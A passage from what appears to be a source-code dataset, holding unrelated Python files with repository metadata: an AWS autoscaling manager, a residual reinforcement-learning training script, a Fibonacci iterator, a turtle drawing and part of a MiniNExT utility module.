] | null | null | null | disco_aws_automation/disco_autoscale.py | Angakkuq/asiaq-aws | f7ddec9fc60aef685f372cbaefee2b08ae18b6a0 | [
"BSD-2-Clause"
] | 4 | 2016-03-22T17:04:04.000Z | 2016-03-23T18:03:45.000Z | disco_aws_automation/disco_autoscale.py | Angakkuit/asiaq-aws | f7ddec9fc60aef685f372cbaefee2b08ae18b6a0 | [
"BSD-2-Clause"
] | null | null | null | '''Contains DiscoAutoscale class that orchestrates AWS Autoscaling'''
import logging
import random
import boto
import boto.ec2
import boto.ec2.autoscale
import boto.ec2.autoscale.launchconfig
import boto.ec2.autoscale.group
from boto.ec2.autoscale.policy import ScalingPolicy
from boto.exception import BotoServerError
import boto3
from .resource_helper import throttled_call
DEFAULT_TERMINATION_POLICIES = ["OldestLaunchConfiguration"]
class DiscoAutoscale(object):
'''Class orchestrating autoscaling'''
def __init__(self, environment_name, autoscaling_connection=None, boto3_autoscaling_connection=None):
self.environment_name = environment_name
self.connection = autoscaling_connection or boto.ec2.autoscale.AutoScaleConnection(
use_block_device_types=True
)
self.boto3_autoscale = boto3_autoscaling_connection or boto3.client('autoscaling')
def get_groupname(self, hostclass):
'''Returns the autoscaling group name when given a hostclass'''
return self.environment_name + '_' + hostclass
def _filter_by_environment(self, items):
'''Filters autoscaling groups and launch configs by environment'''
return [
item for item in items
if item.name.startswith("{0}_".format(self.environment_name))
]
def _filter_instance_by_environment(self, items):
return [
item for item in items
if item.group_name.startswith("{0}_".format(self.environment_name))
]
def get_hostclass(self, groupname):
'''Returns the hostclass when given an autoscaling group name'''
return groupname.replace(self.environment_name + '_', '')
def _get_group_generator(self):
'''Yields groups in current environment'''
next_token = None
while True:
groups = throttled_call(self.connection.get_all_groups,
next_token=next_token)
for group in self._filter_by_environment(groups):
yield group
next_token = groups.next_token
if not next_token:
break
def get_groups(self):
'''Returns Autoscaling groups in current environment'''
return list(self._get_group_generator())
def _get_instance_generator(self, instance_ids=None):
'''Yields autoscaled instances in current environment'''
next_token = None
while True:
instances = throttled_call(
self.connection.get_all_autoscaling_instances,
instance_ids=instance_ids, next_token=next_token)
for instance in self._filter_instance_by_environment(instances):
yield instance
next_token = instances.next_token
if not next_token:
break
def get_instances(self, instance_ids=None):
'''Returns autoscaled instances in the current environment'''
return list(self._get_instance_generator(instance_ids=instance_ids))
def _get_config_generator(self, names=None):
'''Yields Launch Configurations in current environment'''
next_token = None
while True:
configs = throttled_call(self.connection.get_all_launch_configurations,
names=names, next_token=next_token)
for config in self._filter_by_environment(configs):
yield config
next_token = configs.next_token
if not next_token:
break
def get_configs(self, names=None):
'''Returns Launch Configurations in current environment'''
return list(self._get_config_generator(names=names))
def get_config(self, *args, **kwargs):
'''Returns a new launch configuration'''
config = boto.ec2.autoscale.launchconfig.LaunchConfiguration(
connection=self.connection, *args, **kwargs
)
throttled_call(self.connection.create_launch_configuration, config)
return config
def delete_config(self, config_name):
'''Delete a specific Launch Configuration'''
throttled_call(self.connection.delete_launch_configuration, config_name)
def clean_configs(self):
'''Delete unused Launch Configurations in current environment'''
for config in self._get_config_generator():
try:
self.delete_config(config.name)
except BotoServerError:
pass
def delete_group(self, hostclass, force=False):
'''Delete a specific Autoscaling Group'''
throttled_call(self.connection.delete_auto_scaling_group,
self.get_groupname(hostclass), force_delete=force)
def clean_groups(self, force=False):
'''Delete unused Autoscaling Groups in current environment'''
for group in self._filter_by_environment(self.get_groups()):
try:
self.delete_group(self.get_hostclass(group.name), force)
except BotoServerError:
pass
def scaledown_group(self, hostclass):
'''Scales down number of instances in Autoscaling group to zero'''
group_list = throttled_call(self.connection.get_all_groups,
names=[self.get_groupname(hostclass)])
if group_list:
group = group_list[0]
group.min_size = group.max_size = group.desired_capacity = 0
throttled_call(group.update)
def has_group(self, hostclass):
'''Returns True iff current environment has an autoscaling group a hostclass'''
return len(throttled_call(self.connection.get_all_groups,
names=[self.get_groupname(hostclass)])) != 0
@staticmethod
def create_autoscale_tags(group_name, tags):
'''Given a python dictionary return list of boto autoscale Tag objects'''
return [boto.ec2.autoscale.Tag(key=key, value=value, resource_id=group_name, propagate_at_launch=True)
for key, value in tags.iteritems()] if tags else None
def update_group(self, group, launch_config, vpc_zone_id=None,
min_size=None, max_size=None, desired_size=None,
termination_policies=None, tags=None,
load_balancers=None):
'''Update an existing autoscaling group'''
group.launch_config_name = launch_config
if vpc_zone_id:
group.vpc_zone_identifier = vpc_zone_id
if min_size is not None:
group.min_size = min_size
if max_size is not None:
group.max_size = max_size
if desired_size is not None:
group.desired_capacity = desired_size
if termination_policies:
group.termination_policies = termination_policies
throttled_call(group.update)
if tags:
throttled_call(self.connection.create_or_update_tags,
DiscoAutoscale.create_autoscale_tags(group.name, tags))
if load_balancers:
throttled_call(self.boto3_autoscale.attach_load_balancers,
AutoScalingGroupName=group.name,
LoadBalancerNames=load_balancers)
return group
def create_group(self, hostclass, launch_config, vpc_zone_id,
min_size=None, max_size=None, desired_size=None,
termination_policies=None, tags=None,
load_balancers=None):
'''
Create an autoscaling group.
The group must not already exist. Use get_group() instead if you want to update a group if it
exits or create it if it does not.
'''
_min_size = min_size or 0
_max_size = max([min_size, max_size, desired_size, 0])
_desired_capacity = desired_size or max_size
termination_policies = termination_policies or DEFAULT_TERMINATION_POLICIES
group_name = self.get_groupname(hostclass)
group = boto.ec2.autoscale.group.AutoScalingGroup(
connection=self.connection,
name=group_name,
launch_config=launch_config,
load_balancers=load_balancers,
default_cooldown=None,
health_check_type=None,
health_check_period=None,
placement_group=None,
vpc_zone_identifier=vpc_zone_id,
desired_capacity=_desired_capacity,
min_size=_min_size,
max_size=_max_size,
tags=DiscoAutoscale.create_autoscale_tags(group_name, tags),
termination_policies=termination_policies,
instance_id=None)
throttled_call(self.connection.create_auto_scaling_group, group)
return group
def get_group(self, hostclass, launch_config, vpc_zone_id=None,
min_size=None, max_size=None, desired_size=None,
termination_policies=None, tags=None,
load_balancers=None):
'''
Returns autoscaling group.
This updates an existing autoscaling group if it exists,
otherwise this creates a new autoscaling group.
NOTE: Deleting tags is not currently supported.
NOTE: Detaching ELB is not currently supported.
'''
group = self.get_existing_group(hostclass)
if group:
return self.update_group(
group=group, launch_config=launch_config, vpc_zone_id=vpc_zone_id,
min_size=min_size, max_size=max_size, desired_size=desired_size,
termination_policies=termination_policies, tags=tags, load_balancers=load_balancers)
else:
return self.create_group(
hostclass=hostclass, launch_config=launch_config, vpc_zone_id=vpc_zone_id,
min_size=min_size, max_size=max_size, desired_size=desired_size,
termination_policies=termination_policies, tags=tags, load_balancers=load_balancers)
def get_existing_group(self, hostclass):
"""Returns autoscaling group for a hostclass iff it already exists"""
group_name = self.get_groupname(hostclass)
group_list = throttled_call(self.connection.get_all_groups, names=[group_name])
return group_list[0] if group_list else None
def terminate(self, instance_id, decrement_capacity=True):
"""
Terminates an instance using the autoscaling API.
When decrement_capacity is True this allows us to avoid
autoscaling immediately replacing a terminated instance.
"""
throttled_call(self.connection.terminate_instance,
instance_id, decrement_capacity=decrement_capacity)
def get_launch_config_for_hostclass(self, hostclass):
"""Returns an launch configuration for a hostclass if it exists, None otherwise"""
group_list = throttled_call(self.connection.get_all_groups,
names=[self.get_groupname(hostclass)])
if not group_list:
return None
config_list = self.get_configs(names=[group_list[0].launch_config_name])
return config_list[0] if config_list else None
def list_policies(self):
"""Returns all autoscaling policies"""
return throttled_call(self.connection.get_all_policies)
def create_policy(self, policy_name, group_name, adjustment, cooldown):
"""Creates an autoscaling policy and associates it with an autoscaling group"""
policy = ScalingPolicy(name=policy_name, adjustment_type='ChangeInCapacity',
as_name=group_name, scaling_adjustment=adjustment, cooldown=cooldown)
throttled_call(self.connection.create_scaling_policy, policy)
def delete_policy(self, policy_name, group_name):
"""Deletes an autoscaling policy"""
return throttled_call(self.connection.delete_policy, policy_name, group_name)
def delete_all_recurring_group_actions(self, hostclass):
"""Deletes all recurring scheduled actions for a hostclass"""
as_group = self.get_groupname(hostclass)
actions = throttled_call(self.connection.get_all_scheduled_actions, as_group=as_group)
recurring_actions = [action for action in actions if action.recurrence is not None]
for action in recurring_actions:
throttled_call(self.connection.delete_scheduled_action,
scheduled_action_name=action.name, autoscale_group=as_group)
def create_recurring_group_action(self, hostclass, recurrance,
min_size=None, desired_capacity=None, max_size=None):
"""Creates a recurring scheduled action for a hostclass"""
as_group = self.get_groupname(hostclass)
action_name = "{0}_{1}".format(as_group, recurrance.replace('*', 'star').replace(' ', '_'))
throttled_call(self.connection.create_scheduled_group_action,
as_group=as_group, name=action_name,
min_size=min_size,
desired_capacity=desired_capacity,
max_size=max_size,
recurrence=recurrance)
@staticmethod
def _get_snapshot_dev(launch_config, hostclass):
snapshot_devs = [key for key, value in launch_config.block_device_mappings.iteritems()
if value.snapshot_id]
if not snapshot_devs:
raise Exception("Hostclass {0} does not mount a snapshot".format(hostclass))
elif len(snapshot_devs) > 1:
raise Exception("Unsupported configuration: hostclass {0} has multiple snapshot based devices."
.format(hostclass))
return snapshot_devs[0]
def _create_new_launchconfig(self, hostclass, launch_config):
return self.get_config(
name='{0}_{1}_{2}'.format(self.environment_name, hostclass, str(random.randrange(0, 9999999))),
image_id=launch_config.image_id,
key_name=launch_config.key_name,
security_groups=launch_config.security_groups,
block_device_mappings=[launch_config.block_device_mappings],
instance_type=launch_config.instance_type,
instance_monitoring=launch_config.instance_monitoring,
instance_profile_name=launch_config.instance_profile_name,
ebs_optimized=launch_config.ebs_optimized,
user_data=launch_config.user_data,
associate_public_ip_address=launch_config.associate_public_ip_address)
def update_snapshot(self, hostclass, snapshot_id, snapshot_size):
'''Updates an existing autoscaling group to use a different snapshot'''
launch_config = self.get_launch_config_for_hostclass(hostclass)
if not launch_config:
raise Exception("Can't locate hostclass {0}".format(hostclass))
snapshot_bdm = launch_config.block_device_mappings[
DiscoAutoscale._get_snapshot_dev(launch_config, hostclass)]
if snapshot_bdm.snapshot_id != snapshot_id:
old_snapshot_id = snapshot_bdm.snapshot_id
snapshot_bdm.snapshot_id = snapshot_id
snapshot_bdm.size = snapshot_size
self.update_group(self.get_existing_group(hostclass),
self._create_new_launchconfig(hostclass, launch_config).name)
logging.info(
"Updating %s group's snapshot from %s to %s", hostclass, old_snapshot_id, snapshot_id)
else:
logging.debug(
"Autoscaling group %s is already referencing latest snapshot %s", hostclass, snapshot_id)
def update_elb(self, hostclass, elb_names):
'''Updates an existing autoscaling group to use a different set of load balancers'''
group = self.get_existing_group(hostclass)
if not group:
logging.warning("Auto Scaling group %s does not exist. Cannot change %s ELB(s)",
hostclass, ', '.join(elb_names))
return (set(), set())
new_lbs = set(elb_names) - set(group.load_balancers)
extras = set(group.load_balancers) - set(elb_names)
if new_lbs or extras:
logging.info("Updating %s group's elb from [%s] to [%s]",
hostclass, ", ".join(group.load_balancers), ", ".join(elb_names))
if new_lbs:
throttled_call(self.boto3_autoscale.attach_load_balancers,
AutoScalingGroupName=group.name,
LoadBalancerNames=list(new_lbs))
if extras:
throttled_call(self.boto3_autoscale.detach_load_balancers,
AutoScalingGroupName=group.name,
LoadBalancerNames=list(extras))
return (new_lbs, extras)
| 46.271978 | 110 | 0.657543 | 16,399 | 0.973639 | 1,484 | 0.088108 | 877 | 0.052069 | 0 | 0 | 2,889 | 0.171525 |
634b0fccab27c3552b1794373b64b0eabd3f0b1b | 17,621 | py | Python | rrlfd/residual/train.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-13T21:48:52.000Z | 2022-03-13T21:48:52.000Z | rrlfd/residual/train.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | null | null | null | rrlfd/residual/train.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-30T07:20:29.000Z | 2022-03-30T07:20:29.000Z | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Train a residual policy on top of a learned agent.
Usage:
Use case --> flags to set
1) Use base agent
a) Use feats from base agent --> network && bc_ckpt_to_load
b) Learn new feats --> network && bc_ckpt_to_load && rl_observation_network
c) Init feats from base agent but finetune
--> network && bc_ckpt_to_load && rl_observation_network
&& init_feats_from_bc && predict_residual
2) Use RL only
a) Learn new feats --> rl_observation_network (if input type is visual)
b) Init feats & policy from base agent but finetune
--> network && bc_ckpt_to_load && rl_observation_network && init_from_bc
c) Init feats from base agent but finetune
--> network && bc_ckpt_to_load && rl_observation_network
&& init_feats_from_bc
3) Use base controller + rl observation net from scratch
--> base_controller && rl_observation_network
"""
import os
from absl import app
from absl import flags
from acme import specs
import numpy as np
import tensorflow as tf
from rrlfd.residual import agents
from rrlfd.residual import eval_utils
from rrlfd.residual import setup
from tensorflow.io import gfile
flags.DEFINE_string('domain', None, 'Domain from which to load task.')
flags.DEFINE_string('task', None, 'Task to solve.')
flags.DEFINE_enum('input_type', 'depth', ['depth', 'rgb', 'rgbd', 'full_state'],
'Input modality.')
flags.DEFINE_integer('num_episodes', 10000, 'Number of episodes to run for.')
flags.DEFINE_integer('seed', 2, 'Experiment seed.')
flags.DEFINE_integer('eval_seed', 1, 'Environtment seed for evaluation.')
flags.DEFINE_boolean('increment_eval_seed', False,
'If True, increment eval seed after each eval episode.')
flags.DEFINE_integer('num_eval_episodes', 100,
'Number of episodes to evaluate.')
flags.DEFINE_boolean('collapse_in_eval', True,
'If True, collapse RL policy to its mean in evaluation.')
flags.DEFINE_boolean('stop_if_stuck', False,
'If True, end episode if observations and actions are '
'stuck.')
flags.DEFINE_boolean('end_on_success', False,
'If True, end episode early if success criteria is met.')
flags.DEFINE_integer('eval_freq', 100_000,
'Frequency (in environment training steps) with which to '
'evaluate policy.')
flags.DEFINE_boolean('eval_only', False,
'If True, evaluate policy ckpts of trained policy.')
# Flags for BC agent.
flags.DEFINE_boolean('binary_grip_action', True,
'If True, use open/close action space for gripper. Else '
'use gripper velocity.')
flags.DEFINE_enum('action_norm', 'unit', ['unit', 'zeromean_unitvar'],
'Which normalization to apply to actions.')
flags.DEFINE_enum('residual_action_norm', 'unit',
['none', 'unit', 'zeromean_unitvar', 'centered'],
'Which normalization to apply to residual actions.')
flags.DEFINE_float('residual_action_norm_scale', 1.0,
'Factor by which to scale residual actions. Applied to raw '
'predictions in none, unit and centered normalisation, and '
'to standard deviation in the case of zeromean_unitvar.')
flags.DEFINE_enum('signals_norm', 'none', ['none', 'unit', 'zeromean_unitvar'],
'Which normalization to apply to scalar observations.')
flags.DEFINE_string('original_demos_file', None,
'Dataset used to compute stats for action normalization.')
flags.DEFINE_integer('max_demos_to_load', None,
'Maximum number of demos from demos_file (in order) to '
'use to compute action stats.')
flags.DEFINE_integer('max_demo_length', None,
'If set, trim demonstrations to this length.')
flags.DEFINE_float('val_size', 0.05,
'Amount of data to exlude from action normalisation stats. '
'If < 1, the fraction of total loaded data points. Else the '
'number of data points.')
flags.DEFINE_boolean('val_full_episodes', True,
'If True, split data into train and validation on an '
'episode basis. Else split by individual time steps.')
flags.DEFINE_string('last_activation', None,
'Activation function to apply to network output, if any.')
flags.DEFINE_list('fc_layer_sizes', [],
'Sizes of fully connected layers to add on top of bottleneck '
'layer, if any.')
flags.DEFINE_integer('num_input_frames', 3,
'Number of frames to condition base policy on.')
flags.DEFINE_integer('image_size', None, 'Size of rendered images.')
flags.DEFINE_integer('crop_margin_size', 16,
'If crop_frames is True, the number of pixels to crop '
'from each dimension.')
flags.DEFINE_boolean('crop_frames', True,
'If True, crop input frames by 16 pixels in H and W.')
flags.DEFINE_list('target_offsets', [0, 10, 20, 30],
'Offsets in time for actions to predict in behavioral '
'cloning.')
flags.DEFINE_enum('network', None,
['resnet18', 'resnet18_narrow32', 'resnet50', 'simple_cnn',
'hand_vil'],
'Policy network of base policy.')
flags.DEFINE_boolean('bn_before_concat', False,
'If True, add a batch norm layer before concatenating '
'scalar featuses to visual features.')
flags.DEFINE_float('weight_decay', 5e-4, 'Weight decay for training.')
flags.DEFINE_boolean('predict_residual', True,
'If True, train a residual agent. Else train RL from '
'scratch without base agent.')
flags.DEFINE_enum('rl_observation_network', None,
['resnet18', 'resnet18_narrow32', 'resnet50', 'simple_cnn',
'hand_vil'],
'Observation network of residual policy. If None, '
'observation network of base agent is reused.')
flags.DEFINE_boolean('late_fusion', False,
'If True, fuse stacked frames after convolutional layers. '
'If False, fuse at network input.')
flags.DEFINE_string('policy_init_path', None,
'If set, initialize network weights from a pickle file at '
'this path.')
flags.DEFINE_string('rl_observation_network_ckpt', None,
'If set, checkpoint from which to load observation network '
'weights.')
flags.DEFINE_string('base_controller', None,
'If set, a black-box controller to use for base actions.')
flags.DEFINE_string('bc_ckpt_to_load', None,
'If set, checkpoint from which to load base policy.')
flags.DEFINE_string('rl_ckpt_to_load', None,
'If set, checkpoint from which to load residual policy.')
flags.DEFINE_string('original_demos_path', None,
'If set, path to the original demonstration dataset (to '
'restore normalization statistics). If not set, inferred '
'from BC checkpoint path.')
flags.DEFINE_boolean('init_from_bc', False,
'If True, use BC agent loaded from bc_ckpt_to_load as '
'initialization for RL observation and policy nets.')
flags.DEFINE_boolean('init_feats_from_bc', False,
'If True, initialize RL observation network with BC.')
flags.DEFINE_string('logdir', None, 'Location to log results to.')
flags.DEFINE_boolean('load_saved', False,
'If True, load saved model from checkpoint. Else train '
'from scratch.')
flags.DEFINE_string('base_visible_state', 'robot',
'State features on which to condition the base policy.')
flags.DEFINE_string('residual_visible_state', 'robot',
'State features on which to condition the residual policy. '
'If using full state, the BC net features are replaced '
'with these true state features in input to RL policy.')
flags.DEFINE_float('bernoulli_rate', 0.,
'Fraction of time to use bernoulli exploration for gripper '
'action.')
flags.DEFINE_float('sticky_rate', 0.,
'Stickiness rate of bernoulli exploration for gripper '
'action.')
flags.DEFINE_string('job_id', None,
'Subdirectory to add to logdir to identify run. Set '
'automatically to XM id or datetime if None.')
flags.DEFINE_integer('base_policy_success', None,
'No-op flag used to identify base policy.')
flags.DEFINE_boolean('freeze_rl_observation_network', False,
'If True, do not update acme observation network weights. '
'Else train critic and observation net jointly.')
FLAGS = flags.FLAGS
def train_residual(
env_loop, num_episodes, logdir, eval_freq, num_eval_episodes,
collapse_in_eval, eval_seed, increment_eval_seed, stop_if_stuck):
"""Train residual for num_episodes episodes."""
# TODO(minttu): Should bernoulli rate and sticky rate be defined here instead?
total_steps = env_loop.run(
num_episodes=num_episodes,
out_dir=logdir,
ckpt_freq=min(50_000, eval_freq),
eval_freq=eval_freq,
num_eval_episodes=num_eval_episodes,
collapse_in_eval=collapse_in_eval,
eval_seed=eval_seed,
increment_eval_seed=increment_eval_seed,
stop_if_stuck=stop_if_stuck)
if logdir is not None:
setup.save_acme_agent(env_loop.actor, logdir)
return total_steps
def main(_):
np.random.seed(FLAGS.seed)
tf.random.set_seed(FLAGS.seed)
counter = setup.setup_counting()
logdir, env_logger, agent_logger, summary_writer, _ = setup.setup_logging(
FLAGS.logdir)
base_state = setup.set_visible_features(
FLAGS.domain, FLAGS.task, FLAGS.base_visible_state)
residual_state = setup.set_visible_features(
FLAGS.domain, FLAGS.task, FLAGS.residual_visible_state)
print('Base policy state features', base_state)
print('Residual policy state features', residual_state)
image_size = FLAGS.image_size
if image_size is None:
# Default sizes.
image_size = {
'adroit': 128,
'mime': 240,
}[FLAGS.domain]
# Whether BCAgent's network is used for visual features (expects frames in a
# certain shape).
use_base_agent_image_shape = (
FLAGS.predict_residual or FLAGS.freeze_rl_observation_network)
visible_state = (
list(set(base_state + residual_state)) if FLAGS.predict_residual
else residual_state)
env_loop = setup.make_environment_loop(
domain=FLAGS.domain,
task=FLAGS.task,
seed=FLAGS.seed,
input_type=FLAGS.input_type,
num_input_frames=FLAGS.num_input_frames,
visible_state=visible_state,
image_size=image_size,
use_base_agent_image_shape=use_base_agent_image_shape,
late_fusion=FLAGS.late_fusion,
max_train_episode_steps=FLAGS.max_episode_steps,
agent=None,
counter=counter,
env_logger=env_logger,
summary_writer=summary_writer)
env = env_loop._environment # pylint: disable=protected-access
environment_spec = specs.make_environment_spec(env)
print('Environment spec', environment_spec)
base_agent = None
# Create BC agent. In residual RL, it is used as the base agent, and in
# standalone RL it may be used for action and observation space normalization.
if FLAGS.bc_ckpt_to_load or FLAGS.original_demos_file:
base_agent = setup.load_saved_bc_agent(
ckpt_to_load=FLAGS.bc_ckpt_to_load,
network_type=FLAGS.network,
late_fusion=FLAGS.late_fusion,
input_type=FLAGS.input_type,
domain=FLAGS.domain,
binary_grip_action=FLAGS.binary_grip_action,
num_input_frames=FLAGS.num_input_frames,
crop_frames=FLAGS.crop_frames,
full_image_size=image_size,
crop_margin_size=FLAGS.crop_margin_size,
target_offsets=[int(t) for t in FLAGS.target_offsets],
visible_state_features=base_state,
action_norm=FLAGS.action_norm,
signals_norm=FLAGS.signals_norm,
last_activation=FLAGS.last_activation,
fc_layer_sizes=[int(i) for i in FLAGS.fc_layer_sizes],
weight_decay=FLAGS.weight_decay,
max_demos_to_load=FLAGS.max_demos_to_load,
max_demo_length=FLAGS.max_demo_length,
val_size=FLAGS.val_size,
val_full_episodes=FLAGS.val_full_episodes,
split_seed=FLAGS.split_seed,
env=env,
task=FLAGS.task)
print('action normalization mean\n', base_agent.action_space.mean)
print('action normalization std\n', base_agent.action_space.std)
obs_network_type = None
include_base_feats = True
if ((FLAGS.bc_ckpt_to_load is None and FLAGS.policy_init_path is None)
or (FLAGS.init_from_bc and not FLAGS.freeze_rl_observation_network)
or FLAGS.init_feats_from_bc):
obs_network_type = FLAGS.rl_observation_network
include_base_feats = False
if FLAGS.residual_visible_state == 'full':
include_base_feats = False
include_base_action = FLAGS.predict_residual
residual_spec = setup.define_residual_spec(
residual_state, env, base_agent,
action_norm=FLAGS.residual_action_norm,
action_norm_scale=FLAGS.residual_action_norm_scale,
include_base_action=include_base_action,
include_base_feats=include_base_feats,
base_network=FLAGS.network)
binary_grip_action = FLAGS.init_from_bc and FLAGS.binary_grip_action
residual_agent, eval_policy = setup.make_acme_agent(
environment_spec=environment_spec,
residual_spec=residual_spec,
obs_network_type=obs_network_type,
crop_frames=FLAGS.crop_frames,
full_image_size=image_size,
crop_margin_size=FLAGS.crop_margin_size,
late_fusion=FLAGS.late_fusion,
binary_grip_action=binary_grip_action,
input_type=FLAGS.input_type,
counter=counter,
logdir=logdir,
agent_logger=agent_logger)
if FLAGS.init_from_bc:
setup.init_policy_networks(base_agent.network, residual_agent)
if not FLAGS.freeze_rl_observation_network:
setup.init_observation_networks(base_agent.network, residual_agent)
if FLAGS.init_feats_from_bc:
setup.init_observation_networks(base_agent.network, residual_agent)
# agent_class = (
# agents.ResidualAgent if FLAGS.predict_residual else agents.RLAgent)
if FLAGS.predict_residual:
agent_class = agents.ResidualAgent
else:
if FLAGS.freeze_rl_observation_network:
agent_class = agents.FixedObservationAgent
else:
agent_class = agents.RLAgent
agent = agent_class(
base_agent=base_agent,
rl_agent=residual_agent,
action_space='tool_lin' if FLAGS.domain == 'mime' else FLAGS.task,
action_norm=FLAGS.residual_action_norm,
action_norm_scale=FLAGS.residual_action_norm_scale,
signals_norm=FLAGS.signals_norm,
rl_eval_policy=eval_policy,
feats_spec=residual_spec.observations,
state_keys=residual_state,
bernoulli_rate=FLAGS.bernoulli_rate,
sticky_rate=FLAGS.sticky_rate,
rl_observation_network_type=FLAGS.rl_observation_network,
rl_input_type=FLAGS.input_type,
rl_num_input_frames=FLAGS.num_input_frames,
base_controller=FLAGS.base_controller,
env=env)
env_loop.actor = agent
if FLAGS.eval_only:
ckpts = gfile.Glob(os.path.join(logdir, 'policy_*.index'))
print(os.path.join(logdir, 'policy_*.index'))
print(ckpts)
for ckpt in ckpts:
ckpt = ckpt.replace('.index', '')
loaded_steps = setup.load_agent(agent, ckpt)
total_steps = loaded_steps
eval_utils.eval_agent(
env_loop, FLAGS.task, FLAGS.eval_seed, FLAGS.increment_eval_seed,
FLAGS.num_eval_episodes, loaded_steps, FLAGS.collapse_in_eval,
FLAGS.stop_if_stuck, FLAGS.num_episodes, total_steps, logdir,
summary_writer=None, eval_id='late')
else:
if FLAGS.rl_ckpt_to_load is None:
total_steps = train_residual(
env_loop, FLAGS.num_episodes, logdir, FLAGS.eval_freq,
FLAGS.num_eval_episodes, FLAGS.collapse_in_eval, FLAGS.eval_seed,
FLAGS.increment_eval_seed, FLAGS.stop_if_stuck)
loaded_steps = 'final'
else:
loaded_steps = setup.load_agent(agent, FLAGS.rl_ckpt_to_load)
total_steps = loaded_steps
logdir = os.path.dirname(FLAGS.rl_ckpt_to_load)
eval_utils.eval_agent(
env_loop, FLAGS.task, FLAGS.eval_seed, FLAGS.increment_eval_seed,
FLAGS.num_eval_episodes, loaded_steps, FLAGS.collapse_in_eval,
FLAGS.stop_if_stuck, FLAGS.num_episodes, total_steps, logdir,
summary_writer)
if __name__ == '__main__':
app.run(main)
| 43.616337 | 80 | 0.684524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,925 | 0.392997 |
634b7d80c5c9288d78d5d9a43bb5596a0c00f3ab | 438 | py | Python | doc/python_study_code/fibc.py | beiliwenxiao/vimrc | eb38fc769f3f5f78000060dac674b5c49d63c24c | [
"MIT"
] | null | null | null | doc/python_study_code/fibc.py | beiliwenxiao/vimrc | eb38fc769f3f5f78000060dac674b5c49d63c24c | [
"MIT"
] | null | null | null | doc/python_study_code/fibc.py | beiliwenxiao/vimrc | eb38fc769f3f5f78000060dac674b5c49d63c24c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
__metaclass__ = type
class Fibs:
"""docstring for Fibc"""
def __init__(self):
self.a = 0
self.b = 1
def next(self):
self.a, self.b = self.b, self.a+self.b
return self.a
def __iter__(self):
return self
fibs = Fibs()
for f in fibs:
if f > 9999999999999999999999999L:
print 'End Numbers is:',f
break
else:
print f
| 19.043478 | 46 | 0.561644 | 235 | 0.53653 | 0 | 0 | 0 | 0 | 0 | 0 | 76 | 0.173516 |
634dbb7f297045c79fe90538f214e33393d57c93 | 517 | py | Python | Python/turtle_drawer_seanyboi.py | nskesav/Hacktoberfest-Beginner-level | 7f834acb0fd3d4556fb2696a2a7d1e82307f0baf | [
"MIT"
] | 59 | 2019-10-03T07:02:22.000Z | 2021-09-30T18:24:10.000Z | Python/turtle_drawer_seanyboi.py | nskesav/Hacktoberfest-Beginner-level | 7f834acb0fd3d4556fb2696a2a7d1e82307f0baf | [
"MIT"
] | 94 | 2019-10-03T06:58:50.000Z | 2020-09-30T08:08:45.000Z | Python/turtle_drawer_seanyboi.py | nskesav/Hacktoberfest-Beginner-level | 7f834acb0fd3d4556fb2696a2a7d1e82307f0baf | [
"MIT"
] | 267 | 2019-10-03T07:09:30.000Z | 2021-09-30T18:24:11.000Z | # draws a shape and fills with a colour
import turtle
import math
import colorsys
phi = 180 * (3 - math.sqrt(5))
# initialises the turtle Pen
t = turtle.Pen()
t.speed()
# defines the shape to be drawn
def square(t, size):
for tmp in range(0,4):
t.forward(size)
t.right(90)
num = 200
for x in reversed(range(0, num)):
t.fillcolor(colorsys.hsv_to_rgb(x/num, 1.0, 1.0))
t.begin_fill()
t.circle(5 + x, None, 11)
square(t, 5 + x)
t.end_fill()
t.right(phi)
t.right(.8)
# begin drawing
turtle.mainloop()
| 15.666667 | 50 | 0.667311 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 113 | 0.218569 |
634f60b0c83c6e710d6ef16e4bf19157169871cf | 12,073 | py | Python | mininext/util.py | vikaskamath/miniNExT | 6dcf959eec26df50787099a3913a492ba0b35756 | [
"MIT"
] | 36 | 2015-02-02T15:02:15.000Z | 2022-01-14T22:54:58.000Z | mininext/util.py | RS1999ent/miniNExT_evolvability | 1328ea38db507598a430e9f8b547dce06a4374bb | [
"MIT"
] | 15 | 2015-02-21T09:05:13.000Z | 2021-08-31T13:04:00.000Z | mininext/util.py | RS1999ent/miniNExT_evolvability | 1328ea38db507598a430e9f8b547dce06a4374bb | [
"MIT"
] | 29 | 2015-02-27T02:33:00.000Z | 2021-11-21T12:15:31.000Z | """
Additional utilities and patches for MiniNExT.
"""
from os.path import isdir
import os
import pwd
import grp
import shutil
from mininet.util import quietRun
from mininext.mount import ObjectPermissions
# Patches #
def isShellBuiltin(cmd):
"""Override to replace MiniNExT's existing isShellBuiltin() function,
which is partially broken. Function should return true if
cmd issued is a bash builtin."""
# Original version would return true if container name was 'a'
# or similar), as the letter 'a' exists within the output of
# 'bash -c enable'. Prevented below at minimal cost"""
if isShellBuiltin.builtIns is None:
# get shell builtin functions, split at newlines
rawBuiltIns = quietRun('bash -c enable')
# parse the raw collected builtIns, add to a set
isShellBuiltin.builtIns = set()
for rawBuiltIn in rawBuiltIns.split('\n'):
# keep only the part of the string after 'enable' and add to set
isShellBuiltin.builtIns.add(rawBuiltIn.partition(' ')[2])
space = cmd.find(' ')
if space > 0:
cmd = cmd[:space]
return cmd in isShellBuiltin.builtIns
isShellBuiltin.builtIns = None
# Mount support / permissions management #
# Check directory/file state and permissions
def checkIsDir(path):
"Raises exception if path is not valid directory"
if quietCheckIsDir(path) is False:
raise Exception("Path [%s] is not a valid directory" % (path))
def quietCheckIsDir(path):
"Return if path is a valid directory"
return isdir(path)
def checkPath(path):
